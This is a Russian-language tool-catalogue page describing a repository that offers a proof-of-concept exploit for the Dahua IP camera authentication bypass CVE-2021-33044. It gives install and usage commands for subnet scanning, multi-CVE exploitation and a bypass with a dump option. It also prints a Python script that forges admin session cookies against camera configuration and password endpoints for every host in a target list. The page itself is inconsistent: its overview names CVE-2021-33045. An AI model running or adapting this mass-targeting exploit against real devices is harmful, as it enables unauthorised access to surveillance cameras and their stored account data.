Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
Инструменты/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Аутентификация и авторизацияБезопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

Репозиторий
313 месяцев назадЕщё не проверено

Моделирование эксплуатации обхода аутентификации Dahua PoC (CVE-2021-33044)

Обзор

IP-камеры Dahua — это IoT-устройства, широко используемые в системах видеонаблюдения. Поскольку они часто развертываются в локальных сетях или доступны через Интернет, уязвимости безопасности в IP-камерах могут серьезно повлиять на конфиденциальность и безопасность информации.

CVE-2021-33045 — это уязвимость безопасности, существующая в некоторых моделях камер Dahua, позволяющая несанкционированный доступ к внутренним конфигурационным ресурсам без надлежащей аутентификации. Эта уязвимость возникает из-за нестрогого механизма контроля доступа в прошивке устройства.

Информация об уязвимости

ПунктСодержание
CVECVE-2021-33044
ТипОбход аутентификации
СтепеньКритическая (CVSS ~9.8)
АутентификацияНе требуется
ВлияниеКамеры Dahua / DVR / NVR

Причина

Уязвимость возникает из-за небезопасной конструкции аутентификации в прошивке камер Dahua:

  • Сервер не проверяет должным образом сессию/токен
  • Доверяет данным, отправленным клиентом
  • Некоторые чувствительные конфигурационные конечные точки проверяют только наличие cookie, а не реальные права доступа

Это позволяет атакующему:

  • подделать процесс аутентификации
  • полностью обойти вход в систему

Ссылки:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Принцип работы механизма обхода аутентификации

Обычный поток

→ Клиент отправляет HTTP-запрос с произвольным cookie
→ Камера проверяет cookie на уровне интерфейса
→ Отсутствует проверка действительной сессии на бэкенде
→ Разрешает прямой доступ к внутренним конфигурационным конечным точкам
→ Возвращает чувствительные данные

Сценарий

ФайлЦельCVE
dahua_scanner.pyОбнаружение сети — поиск камер Dahua в подсетиОбнаружение
dahua_exploit.pyИнструмент сканирования Multi-CVE — проверка всех уязвимостей безопасности.Все
dahua_auth_bypass.pyСпециализированный обход аутентификации с опцией --dumpCVE-2021-33044

Использование

Установка

# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Сканирование сети

# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Common Dahua ports: 80,443, 8080, 37777, 37778

Эксплуатация уязвимости CVE

python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Обход аутентификации

python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump устройства после обхода

Пример

#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Пояснение

  • Скрипт использует библиотеку requests и активно отключает предупреждения SSL, чтобы отключить предупреждения SSL

  • Функция dump_accounts(ip, port=80) является основной функцией, ответственной за проверку одного устройства камеры. Основная функция функции заключается в:

    • Формировании URL из IP-адреса и порта
    • Имитации статуса входа администратора через cookie
    • Отправке запроса к чувствительным конфигурационным конечным точкам
    • Анализе ответа для определения, уязвимо ли устройство
  • Имитация cookie аутентификации. Функция использует такие значения cookie, как:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • В уязвимых версиях камер бэкенд не проверяет фактический sessionID, что приводит к тому, что система считает, что запрос отправлен от действительной учетной записи администратора.

Цикл обработки списка целей

Скрипт читает список целей из входного файла, последовательно вызывая функцию проверки для каждого устройства. Такой подход позволяет автоматически оценивать множество камер.

image

Процесс разработки

Эти скрипты были разработаны на основе:

  • Опубликованных деталей CVE от NVD
  • Уведомлений безопасности Dahua
  • Публичных PoC-ссылок (seclists.org, packetstormsecurity)

Статус тестирования:

  • Логика обхода аутентификации реализована в соответствии со спецификациями CVE
  • Ограниченное тестирование на уязвимых устройствах.

Примечание

Этот проект:

  • Предназначен только для учебных и исследовательских целей
  • Запускайте в личной лабораторной среде
Скачать инструмент